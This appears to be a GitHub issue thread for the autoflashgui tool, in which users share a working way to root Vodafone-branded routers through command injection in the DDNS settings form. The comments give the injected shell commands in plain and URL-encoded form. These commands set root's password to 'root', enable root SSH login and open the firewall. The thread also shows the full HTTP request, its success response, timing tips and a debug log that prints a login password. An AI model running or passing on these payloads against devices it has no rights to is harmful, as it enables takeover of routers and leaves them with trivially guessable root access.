Comments (4)
Line: variant=DGA0130VDF Vodafone 17.1.7988 (root) Advanced DDNS,AdvancedDDNS,www.DynDNS.org,sleep 30;
mainscript host: 192.168.1.1
mainscript username: b'vodafone'
mainscript password: b'fxXfjhUwENKn'
mainscript flashFirmware: 0
mainscript upgradeFilename:
mainscript flashSleepDelay: 120
mainscript activeMethod: AdvancedDDNS
mainscript activeCommand: sleep 30;
mainscript splitCommand: 1
mainscript ddnsService: www.DynDNS.org
mainscript connectRetryDelay: 5
mainscript interCommandDelay: 5
Connect attempt 1
<Response [200]>
Modem up
Authenticating
Authentication failed, debug values are: ['Got CSRF token: 1e636dfeed589dcd4a6253d6b73bafa7040eb59a19007dc43d3d26fe99470819', "A value b'877b7d4b6bba5eeebc07da61ce4cca5f6690056fade94e8cb14d7208c4291d5dc8f2fb2edecf285042f84db5021f5cf15835d97b0ea4f53ca9c5f5327f748f4a4629d33e3af806db6dc71f99763e4713e2fa2b69dd5514a3304846a17dceb4b5e43bd2860bebde6aa030fc04fa3596e9a9036b259119f189dec0e8f3ce6e6b3acc414b866ae62ab32834b2908a55de1eb4dbead33a361d0b4788a5b8992be9dcf6ff882b622384c2987f22dfa573e892beb090ce7300215780996f58a420203418b038fe2453fb3edfdb89cc3ea5a958c98f2f59fa0a681769ec94309afde7e568bc9a1417c390c2b8ac2b35e0ec0b063707c94d02e289e9e8a4053589b3c6f2'", 'br.response <Response [200]>', "Challenge received: {'error': {'msg': 'failed', 'waitTime': '7', 'wrongCount': '6'}}"]
Exception: <class 'KeyError'>
Exception in Tkinter callback
Traceback (most recent call last):
File "/home/henry/Documents/vodafone hack/exploit/theirs/autoflashgui/libautoflashgui.py", line 37, in srp6authenticate
M = usr.process_challenge(binascii.unhexlify(j['s']), binascii.unhexlify(j['B']))
KeyError: 's'
this is where I'm at currently
from autoflashgui.
Tested On firmware: RC2.4.6_prod_AUTH_vant-9_17.1.7988-2461009-20180510014336.rbi / 17.1.7988-2461009-CRF846-V2.4.6
the commands needed to root bring up dropbear and allow ssh through the firewall
user/pass: root:root with a loopback char of Y you could also just look for the success json in the response.
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;echo Y
echo "root:root" | chpasswd;echo Y
uci set dropbear.wan.enable='0';echo Y
uci set dropbear.lan.enable='1';echo Y
uci set dropbear.lan.PasswordAuth=on;echo Y
uci set dropbear.lan.RootPasswordAuth=on;echo Y
uci set dropbear.lan.RootLogin=1;echo Y
uci set firewall.Allow_SSH_Vodafone_lan.target='ACCEPT';echo Y
uci commit;echo Y
echo > /etc/dropbear/authorized_keys;echo Y
/etc/init.d/firewall restart;echo Y
/etc/init.d/dropbear restart;echo Y
sed -i 's/#//' /etc/inittab
or formatted for injection
%3Bsed+-i+'s#root:%2Fbin%2Ffalse#root:%2Fbin%2Fash#'+%2Fetc%2Fpasswd%3Becho+Y
%3Becho+"root:root"+|+chpasswd%3Becho+Y
%3Buci+set+dropbear.wan.enable='0'%3Becho+Y
%3Buci+set+dropbear.lan.enable='1'%3Becho+Y
%3Buci+set+dropbear.lan.PasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootPasswordAuth=on%3Becho+Y
%3Buci+set+dropbear.lan.RootLogin=1%3Becho+Y
%3Buci+set+firewall.Allow_SSH_Vodafone_lan.target='ACCEPT'%3Becho+Y
%3Buci+commit%3Becho+Y
%3Becho+>+%2Fetc%2Fdropbear%2Fauthorized_keys%3Becho+Y
%3B%2Fetc%2Finit.d%2Ffirewall+restart%3Becho+Y
%3B%2Fetc%2Finit.d%2Fdropbear+restart%3Becho+Y
%3Bsed+-i+'s%2F#%2F%2F'+%2Fetc%2Finittab
I have confirmed these commands can be executed manually and work through the webui on firmware
DDNS Request:
POST http://192.168.1.1/modals/dns-ddns.lp HTTP/1.1
Connection: keep-alive
Content-Length: 232
Accept: /
Origin: https://192.168.1.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://192.168.1.1/
Accept-Language: en-gb
Cookie: webui_language=en-us; sessionID=d937126e96d3b948ceaff4398b9c329aa00d87342eb9d3b38e832b92df24b719
Host: 192.168.1.1
ddnsStatus=1&ddnsService=dyndns.org&ddnsDomain=test.com&ddnsUsrname=user&ddnsPswrd=pass&securedns=0&action=SAVE&CSRFtoken=a1a717126289a0062708bc3396761d3a4ed94b2b0abdd3b84089bd7de07b46b2
DDNS RESPONSE:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 Sep 2019 12:43:50 GMT
Content-Type: application/json
Connection: keep-alive
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline';
cache-control: no-cache
Content-Language: en-us
X-Frame-Options: SAMEORIGIN
{ "status":"success" }
from autoflashgui.
There is a working fork for VANT-9 here now: https://github.com/jameskeenan295/autoflashgui
but the commands need to be run multiple times to take effect before the ssh shell starts working. So its still a work in progress.
from autoflashgui.
Did some more testing today and noticed a few interesting points about the rooting process through ddns command injection.
- on VANT-9 and VBNT-Z the commands have a large delay from when the POST is sent before they execute. I observed the delay by posting lots of curl commands and then measured the delta from timestamps from the POST and the web server logs.
- VANT-9 & VBNT-Z both execute the commands twice, for each post to the ddns form. The first executes at +11sec, and second around +23sec.
- The command length (POST'ed to the ddns form) can exceed 1024 characters (I tested various lengths using curl commands
- Easiest method is to submit all the commands in one go, with semicolons between them, and then have patience to wait at least 30sec before testing it.
- VBNT-Z uses different ddns and firmware upgrade URL's to VANT-9
Rooting process is working reliably now for both router models, using default ssh port 22.
To keep things simple for merging the fork back into mswhirls code later I've removed the http server component of the AFG fork, and updated defaults.ini with two new entries:
DNA0130 Vodafone NZ 17.4.0182-0841014
DGA0130 Vodafone NZ 17.1.7988-2461009-CRF846-V2.4.6
Recommendations are:
Untick the "split the given command on semicolons..." option in the AFG GUI (or set defaultSplitCommand=0 in defaults.ini)
Or: you must use: defaultInterCommandDelay=30
Some other minor changes to libautoflashgui.py:
Added timestamps to all the print commands.
Added additional URL's for firmware flashing VANT-9 & VBNT-Z. The flashing process doesn't work yet through AFG. I just get: 500 Internal Server Error
https://github.com/jameskeenan295/autoflashgui
from autoflashgui.
Related Issues (20)
- Proposals of changes/improvements for autoflashgui HOT 1
- Auth script HOT 2
- Multilanguage code not working HOT 1
- Code not work as expected HOT 1
- [SOLVED] Cannot install HOT 3
- struggle with dga4132 HOT 2
- Running doesn't run =( HOT 2
- [ENHANCEMENT] add support for 788VN TELMEX 17.2.0360 HOT 2
- ValueError preventing program launch HOT 7
- TG799vac Xtream / VANT-W
- VBNT-K HOT 1
- [SSL: CERTIFICATE_VERIFY_FAILED]
- NameError: name 'sys' is not defined HOT 4
- .exe in repo won't start from NETPATH
- Cannot run on MacOS HOT 3
- The version of this file is not compatible HOT 1
- werkzeug import cached_property issue HOT 2
- VBNT-L no root access | Access denied! HOT 2
- Cannot run with urllib3 HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from autoflashgui.